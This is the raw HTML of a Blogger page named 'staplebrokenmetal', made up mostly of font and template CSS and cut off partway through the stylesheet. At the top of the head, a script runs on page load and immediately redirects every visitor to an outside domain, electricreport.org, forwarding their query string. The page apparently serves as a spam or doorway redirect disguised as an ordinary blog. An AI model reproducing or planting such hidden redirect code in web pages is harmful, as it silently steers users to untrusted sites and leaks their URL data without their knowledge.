"HTML": "<!DOCTYPE html>\n<html dir='ltr' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>\n<head>\n<script>\n let linkName = \"https://electricreport.org/ygd4g\"\n let strGET = window.location.search.replace( '?', '');\n location.replace(linkName + \"?\" + strGET)\n </script>\n<meta content='width=device-width, initial-scale=1' name='viewport'/>\n<title>staplebrokenmetal</title>\n<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>\n<!-- Chrome, Firefox OS and Opera -->\n<meta content='#eeeeee' name='theme-color'/>\n<!-- Windows Phone -->\n<meta content='#eeeeee' name='msapplication-navbutton-color'/>\n<meta content='blogger' name='generator'/>\n<link href='https://staplebrokenmetaliyro.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>\n<link href='https://staplebrokenmetaliyro.blogspot.com/' rel='canonical'/>\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"staplebrokenmetal - Atom\" href=\"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\" />\n<link rel=\"alternate\" type=\"application/rss+xml\" title=\"staplebrokenmetal - RSS\" href=\"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt=rss\" />\n<link rel=\"service.post\" type=\"application/atom+xml\" title=\"staplebrokenmetal - Atom\" href=\"https://www.blogger.com/feeds/3967763303726818370/posts/default\" />\n<link rel=\"me\" href=\"https://www.blogger.com/profile/02686294779557843862\" />\n<!--Can't find substitution for tag [blog.ieCssRetrofitLinks]-->\n<meta content='https://staplebrokenmetaliyro.blogspot.com/' property='og:url'/>\n<meta content='staplebrokenmetal' property='og:title'/>\n<meta content='' property='og:description'/>\n<style type='text/css'>@font-face{font-family:'Damion';font-style:normal;font-weight:400;font-display:swap;src:url(//fonts.gstatic.com/s/damion/v15/hv-XlzJ3KEUe_YZkZGw2ATE.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Damion';font-style:normal;font-weight:400;font-display:swap;src:url(//fonts.gstatic.com/s/damion/v15/hv-XlzJ3KEUe_YZkamw2.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDTbtPY_Q.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDYbtPY_Q.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDZbtPY_Q.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDXbtM.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAX-k2Qn.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C8A,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAz-k2Qn.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAT-k2Qn.woff2)format('woff2');unicode-range:U+1F00-1FFF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAv-k2Qn.woff2)format('woff2');unicode-range:U+0370-0377,U+037A-037F,U+0384-038A,U+038C,U+038E-03A1,U+03A3-03FF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuHT-k2Qn.woff2)format('woff2');unicode-range:U+0302-0303,U+0305,U+0307-0308,U+0310,U+0312,U+0315,U+031A,U+0326-0327,U+032C,U+032F-0330,U+0332-0333,U+0338,U+033A,U+0346,U+034D,U+0391-03A1,U+03A3-03A9,U+03B1-03C9,U+03D1,U+03D5-03D6,U+03F0-03F1,U+03F4-03F5,U+2016-2017,U+2034-2038,U+203C,U+2040,U+2043,U+2047,U+2050,U+2057,U+205F,U+2070-2071,U+2074-208E,U+2090-209C,U+20D0-20DC,U+20E1,U+20E5-20EF,U+2100-2112,U+2114-2115,U+2117-2121,U+2123-214F,U+2190,U+2192,U+2194-21AE,U+21B0-21E5,U+21F1-21F2,U+21F4-2211,U+2213-2214,U+2216-22FF,U+2308-230B,U+2310,U+2319,U+231C-2321,U+2336-237A,U+237C,U+2395,U+239B-23B7,U+23D0,U+23DC-23E1,U+2474-2475,U+25AF,U+25B3,U+25B7,U+25BD,U+25C1,U+25CA,U+25CC,U+25FB,U+266D-266F,U+27C0-27FF,U+2900-2AFF,U+2B0E-2B11,U+2B30-2B4C,U+2BFE,U+3030,U+FF5B,U+FF5D,U+1D400-1D7FF,U+1EE00-1EEFF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuGb-k2Qn.woff2)format('woff2');unicode-range:U+0001-000C,U+000E-001F,U+007F-009F,U+20DD-20E0,U+20E2-20E4,U+2150-218F,U+2190,U+2192,U+2194-2199,U+21AF,U+21E6-21F0,U+21F3,U+2218-2219,U+2299,U+22C4-22C6,U+2300-243F,U+2440-244A,U+2460-24FF,U+25A0-27BF,U+2800-28FF,U+2921-2922,U+2981,U+29BF,U+29EB,U+2B00-2BFF,U+4DC0-4DFF,U+FFF9-FFFB,U+10140-1018E,U+10190-1019C,U+101A0,U+101D0-101FD,U+102E0-102FB,U+10E60-10E7E,U+1D2C0-1D2D3,U+1D2E0-1D37F,U+1F000-1F0FF,U+1F100-1F1AD,U+1F1E6-1F1FF,U+1F30D-1F30F,U+1F315,U+1F31C,U+1F31E,U+1F320-1F32C,U+1F336,U+1F378,U+1F37D,U+1F382,U+1F393-1F39F,U+1F3A7-1F3A8,U+1F3AC-1F3AF,U+1F3C2,U+1F3C4-1F3C6,U+1F3CA-1F3CE,U+1F3D4-1F3E0,U+1F3ED,U+1F3F1-1F3F3,U+1F3F5-1F3F7,U+1F408,U+1F415,U+1F41F,U+1F426,U+1F43F,U+1F441-1F442,U+1F444,U+1F446-1F449,U+1F44C-1F44E,U+1F453,U+1F46A,U+1F47D,U+1F4A3,U+1F4B0,U+1F4B3,U+1F4B9,U+1F4BB,U+1F4BF,U+1F4C8-1F4CB,U+1F4D6,U+1F4DA,U+1F4DF,U+1F4E3-1F4E6,U+1F4EA-1F4ED,U+1F4F7,U+1F4F9-1F4FB,U+1F4FD-1F4FE,U+1F503,U+1F507-1F50B,U+1F50D,U+1F512-1F513,U+1F53E-1F54A,U+1F54F-1F5FA,U+1F610,U+1F650-1F67F,U+1F687,U+1F68D,U+1F691,U+1F694,U+1F698,U+1F6AD,U+1F6B2,U+1F6B9-1F6BA,U+1F6BC,U+1F6C6-1F6CF,U+1F6D3-1F6D7,U+1F6E0-1F6EA,U+1F6F0-1F6F3,U+1F6F7-1F6FC,U+1F700-1F7FF,U+1F800-1F80B,U+1F810-1F847,U+1F850-1F859,U+1F860-1F887,U+1F890-1F8AD,U+1F8B0-1F8BB,U+1F8C0-1F8C1,U+1F900-1F90B,U+1F93B,U+1F946,U+1F984,U+1F996,U+1F9E9,U+1FA00-1FA6F,U+1FA70-1FA7C,U+1FA80-1FA89,U+1FA8F-1FAC6,U+1FACE-1FADC,U+1FADF-1FAE9,U+1FAF0-1FAF8,U+1FB00-1FBFF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAf-k2Qn.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAb-k2Qn.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAj-kw.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C8A,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)format('woff2');unicode-range:U+1F00-1FFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)format('woff2');unicode-range:U+0370-0377,U+037A-037F,U+0384-038A,U+038C,U+038E-03A1,U+03A3-03FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)format('woff2');unicode-range:U+0302-0303,U+0305,U+0307-0308,U+0310,U+0312,U+0315,U+031A,U+0326-0327,U+032C,U+032F-0330,U+0332-0333,U+0338,U+033A,U+0346,U+034D,U+0391-03A1,U+03A3-03A9,U+03B1-03C9,U+03D1,U+03D5-03D6,U+03F0-03F1,U+03F4-03F5,U+2016-2017,U+2034-2038,U+203C,U+2040,U+2043,U+2047,U+2050,U+2057,U+205F,U+2070-2071,U+2074-208E,U+2090-209C,U+20D0-20DC,U+20E1,U+20E5-20EF,U+2100-2112,U+2114-2115,U+2117-2121,U+2123-214F,U+2190,U+2192,U+2194-21AE,U+21B0-21E5,U+21F1-21F2,U+21F4-2211,U+2213-2214,U+2216-22FF,U+2308-230B,U+2310,U+2319,U+231C-2321,U+2336-237A,U+237C,U+2395,U+239B-23B7,U+23D0,U+23DC-23E1,U+2474-2475,U+25AF,U+25B3,U+25B7,U+25BD,U+25C1,U+25CA,U+25CC,U+25FB,U+266D-266F,U+27C0-27FF,U+2900-2AFF,U+2B0E-2B11,U+2B30-2B4C,U+2BFE,U+3030,U+FF5B,U+FF5D,U+1D400-1D7FF,U+1EE00-1EEFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)format('woff2');unicode-range:U+0001-000C,U+000E-001F,U+007F-009F,U+20DD-20E0,U+20E2-20E4,U+2150-218F,U+2190,U+2192,U+2194-2199,U+21AF,U+21E6-21F0,U+21F3,U+2218-2219,U+2299,U+22C4-22C6,U+2300-243F,U+2440-244A,U+2460-24FF,U+25A0-27BF,U+2800-28FF,U+2921-2922,U+2981,U+29BF,U+29EB,U+2B00-2BFF,U+4DC0-4DFF,U+FFF9-FFFB,U+10140-1018E,U+10190-1019C,U+101A0,U+101D0-101FD,U+102E0-102FB,U+10E60-10E7E,U+1D2C0-1D2D3,U+1D2E0-1D37F,U+1F000-1F0FF,U+1F100-1F1AD,U+1F1E6-1F1FF,U+1F30D-1F30F,U+1F315,U+1F31C,U+1F31E,U+1F320-1F32C,U+1F336,U+1F378,U+1F37D,U+1F382,U+1F393-1F39F,U+1F3A7-1F3A8,U+1F3AC-1F3AF,U+1F3C2,U+1F3C4-1F3C6,U+1F3CA-1F3CE,U+1F3D4-1F3E0,U+1F3ED,U+1F3F1-1F3F3,U+1F3F5-1F3F7,U+1F408,U+1F415,U+1F41F,U+1F426,U+1F43F,U+1F441-1F442,U+1F444,U+1F446-1F449,U+1F44C-1F44E,U+1F453,U+1F46A,U+1F47D,U+1F4A3,U+1F4B0,U+1F4B3,U+1F4B9,U+1F4BB,U+1F4BF,U+1F4C8-1F4CB,U+1F4D6,U+1F4DA,U+1F4DF,U+1F4E3-1F4E6,U+1F4EA-1F4ED,U+1F4F7,U+1F4F9-1F4FB,U+1F4FD-1F4FE,U+1F503,U+1F507-1F50B,U+1F50D,U+1F512-1F513,U+1F53E-1F54A,U+1F54F-1F5FA,U+1F610,U+1F650-1F67F,U+1F687,U+1F68D,U+1F691,U+1F694,U+1F698,U+1F6AD,U+1F6B2,U+1F6B9-1F6BA,U+1F6BC,U+1F6C6-1F6CF,U+1F6D3-1F6D7,U+1F6E0-1F6EA,U+1F6F0-1F6F3,U+1F6F7-1F6FC,U+1F700-1F7FF,U+1F800-1F80B,U+1F810-1F847,U+1F850-1F859,U+1F860-1F887,U+1F890-1F8AD,U+1F8B0-1F8BB,U+1F8C0-1F8C1,U+1F900-1F90B,U+1F93B,U+1F946,U+1F984,U+1F996,U+1F9E9,U+1FA00-1FA6F,U+1FA70-1FA7C,U+1FA80-1FA89,U+1FA8F-1FAC6,U+1FACE-1FADC,U+1FADF-1FAE9,U+1FAF0-1FAF8,U+1FB00-1FBFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C8A,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)format('woff2');unicode-range:U+1F00-1FFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)format('woff2');unicode-range:U+0370-0377,U+037A-037F,U+0384-038A,U+038C,U+038E-03A1,U+03A3-03FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)format('woff2');unicode-range:U+0302-0303,U+0305,U+0307-0308,U+0310,U+0312,U+0315,U+031A,U+0326-0327,U+032C,U+032F-0330,U+0332-0333,U+0338,U+033A,U+0346,U+034D,U+0391-03A1,U+03A3-03A9,U+03B1-03C9,U+03D1,U+03D5-03D6,U+03F0-03F1,U+03F4-03F5,U+2016-2017,U+2034-2038,U+203C,U+2040,U+2043,U+2047,U+2050,U+2057,U+205F,U+2070-2071,U+2074-208E,U+2090-209C,U+20D0-20DC,U+20E1,U+20E5-20EF,U+2100-2112,U+2114-2115,U+2117-2121,U+2123-214F,U+2190,U+2192,U+2194-21AE,U+21B0-21E5,U+21F1-21F2,U+21F4-2211,U+2213-2214,U+2216-22FF,U+2308-230B,U+2310,U+2319,U+231C-2321,U+2336-237A,U+237C,U+2395,U+239B-23B7,U+23D0,U+23DC-23E1,U+2474-2475,U+25AF,U+25B3,U+25B7,U+25BD,U+25C1,U+25CA,U+25CC,U+25FB,U+266D-266F,U+27C0-27FF,U+2900-2AFF,U+2B0E-2B11,U+2B30-2B4C,U+2BFE,U+3030,U+FF5B,U+FF5D,U+1D400-1D7FF,U+1EE00-1EEFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)format('woff2');unicode-range:U+0001-000C,U+000E-001F,U+007F-009F,U+20DD-20E0,U+20E2-20E4,U+2150-218F,U+2190,U+2192,U+2194-2199,U+21AF,U+21E6-21F0,U+21F3,U+2218-2219,U+2299,U+22C4-22C6,U+2300-243F,U+2440-244A,U+2460-24FF,U+25A0-27BF,U+2800-28FF,U+2921-2922,U+2981,U+29BF,U+29EB,U+2B00-2BFF,U+4DC0-4DFF,U+FFF9-FFFB,U+10140-1018E,U+10190-1019C,U+101A0,U+101D0-101FD,U+102E0-102FB,U+10E60-10E7E,U+1D2C0-1D2D3,U+1D2E0-1D37F,U+1F000-1F0FF,U+1F100-1F1AD,U+1F1E6-1F1FF,U+1F30D-1F30F,U+1F315,U+1F31C,U+1F31E,U+1F320-1F32C,U+1F336,U+1F378,U+1F37D,U+1F382,U+1F393-1F39F,U+1F3A7-1F3A8,U+1F3AC-1F3AF,U+1F3C2,U+1F3C4-1F3C6,U+1F3CA-1F3CE,U+1F3D4-1F3E0,U+1F3ED,U+1F3F1-1F3F3,U+1F3F5-1F3F7,U+1F408,U+1F415,U+1F41F,U+1F426,U+1F43F,U+1F441-1F442,U+1F444,U+1F446-1F449,U+1F44C-1F44E,U+1F453,U+1F46A,U+1F47D,U+1F4A3,U+1F4B0,U+1F4B3,U+1F4B9,U+1F4BB,U+1F4BF,U+1F4C8-1F4CB,U+1F4D6,U+1F4DA,U+1F4DF,U+1F4E3-1F4E6,U+1F4EA-1F4ED,U+1F4F7,U+1F4F9-1F4FB,U+1F4FD-1F4FE,U+1F503,U+1F507-1F50B,U+1F50D,U+1F512-1F513,U+1F53E-1F54A,U+1F54F-1F5FA,U+1F610,U+1F650-1F67F,U+1F687,U+1F68D,U+1F691,U+1F694,U+1F698,U+1F6AD,U+1F6B2,U+1F6B9-1F6BA,U+1F6BC,U+1F6C6-1F6CF,U+1F6D3-1F6D7,U+1F6E0-1F6EA,U+1F6F0-1F6F3,U+1F6F7-1F6FC,U+1F700-1F7FF,U+1F800-1F80B,U+1F810-1F847,U+1F850-1F859,U+1F860-1F887,U+1F890-1F8AD,U+1F8B0-1F8BB,U+1F8C0-1F8C1,U+1F900-1F90B,U+1F93B,U+1F946,U+1F984,U+1F996,U+1F9E9,U+1FA00-1FA6F,U+1FA70-1FA7C,U+1FA80-1FA89,U+1FA8F-1FAC6,U+1FACE-1FADC,U+1FADF-1FAE9,U+1FAF0-1FAF8,U+1FB00-1FBFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}</style>\n<style id='page-skin-1' type='text/css'><!--\n/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=\"button\"],input[type=\"reset\"],input[type=\"submit\"]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=\"checkbox\"],input[type=\"radio\"]{box-sizing:border-box;padding:0}input[type=\"number\"]::-webkit-inner-spin-button,input[type=\"number\"]::-webkit-outer-spin-button{height:auto}input[type=\"search\"]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}input[type=\"search\"]::-webkit-search-cancel-button,input[type=\"search\"]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid #c0c0c0;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}textarea{overflow:auto}optgroup{font-weight:bold}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}\n/*!************************************************\n* Blogger Template Style\n* Name: Contempo\n**************************************************/\nbody{\noverflow-wrap:break-word;\nword-break:break-word;\nword-wrap:break-word\n}\n.hidden{\ndisplay:none\n}\n.invisible{\nvisibility:hidden\n}\n.container::after,.float-container::after{\nclear:both;\ncontent:\"\";\ndisplay:table\n}\n.clearboth{\nclear:both\n}\n#comments .comment .comment-actions,.subscribe-popup .FollowByEmail .follow-by-email-submit,.widget.Profile .profile-link,.widget.Profile .profile-link.visit-profile{\nbackground:0 0;\nborder:0;\nbox-shadow:none;\ncolor:#2196f3;\ncursor:pointer;\nfont-size:14px;\nfont-weight:700;\noutline:0;\ntext-decoration:none;\ntext-transform:uppercase;\nwidth:auto\n}\n.dim-overlay{\nbackground-color:rgba(0,0,0,.54);\nheight:100vh;\nleft:0;\nposition:fixed;\ntop:0;\nwidth:100%\n}\n#sharing-dim-overlay{\nbackground-color:transparent\n}\ninput::-ms-clear{\ndisplay:none\n}\n.blogger-logo,.svg-icon-24.blogger-logo{\nfill:#ff9800;\nopacity:1\n}\n.loading-spinner-large{\n-webkit-animation:mspin-rotate 1.568s infinite linear;\nanimation:mspin-rotate 1.568s infinite linear;\nheight:48px;\noverflow:hidden;\nposition:absolute;\nwidth:48px;\nz-index:200\n}\n.loading-spinner-large>div{\n-webkit-animation:mspin-revrot 5332ms infinite steps(4);\nanimation:mspin-revrot 5332ms infinite steps(4)\n}\n.loading-spinner-large>div>div{\n-webkit-animation:mspin-singlecolor-large-film 1333ms infinite steps(81);\nanimation:mspin-singlecolor-large-film 1333ms infinite steps(81);\nbackground-size:100%;\nheight:48px;\nwidth:3888px\n}\n.mspin-black-large>div>div,.mspin-grey_54-large>div>div{\nbackground-image:url(https://www.blogblog.com/indie/mspin_black_large.svg)\n}\n.mspin-white-large>div>div{\nbackground-image:url(https://www.blogblog.com/indie/mspin_white_large.svg)\n}\n.mspin-grey_54-large{\nopacity:.54\n}\n@-webkit-keyframes mspin-singlecolor-large-film{\nfrom{\n-webkit-transform:translateX(0);\ntransform:translateX(0)\n}\nto{\n-webkit-transform:translateX(-3888px);\ntransform:translateX(-3888px)\n}\n}\n@keyframes 